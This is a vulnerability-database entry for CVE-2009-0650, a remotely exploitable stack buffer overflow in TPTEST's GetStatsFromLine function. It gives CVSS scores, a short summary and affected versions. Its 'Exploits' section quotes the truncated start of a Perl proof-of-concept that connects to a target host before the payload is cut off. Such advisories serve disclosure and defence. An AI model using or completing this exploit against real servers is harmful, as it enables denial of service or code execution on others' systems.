10
CVSSv2

CVE-2009-0650

Published: 20/02/2009 Updated: 29/09/2017
CVSS v2 Base Score: 10 | Impact Score: 10 | Exploitability Score: 10
VMScore: 1000
Vector: AV:N/AC:L/Au:N/C:C/I:C/A:C

Vulnerability Summary

Stack-based buffer overflow in the GetStatsFromLine function in TPTEST 3.1.7 and previous versions, and possibly 5.02, allows remote malicious users to cause a denial of service (application crash) and possibly execute arbitrary code via a STATS line with a long pwd field. NOTE: some of these details are obtained from third party information.

Vulnerable Product Search on Vulmon Subscribe to Product

tptest tptest

tptest tptest 5.0.2

Exploits

#!/usr/local/bin/perl # TPTEST <= 317 (maby also 502?) # tptestsourceforgenet # stackbased buffer overflow poc in server (client can also be exploit) # author: ffwd use IO::Socket;($host,$port)=@ARGV; $rem=IO::Socket::INET->new(Proto=>"tcp",PeerAddr=>$host,PeerPort=>$port); if(!$rem){die "1\n";}$rem->autoflush(1); $cookie= ...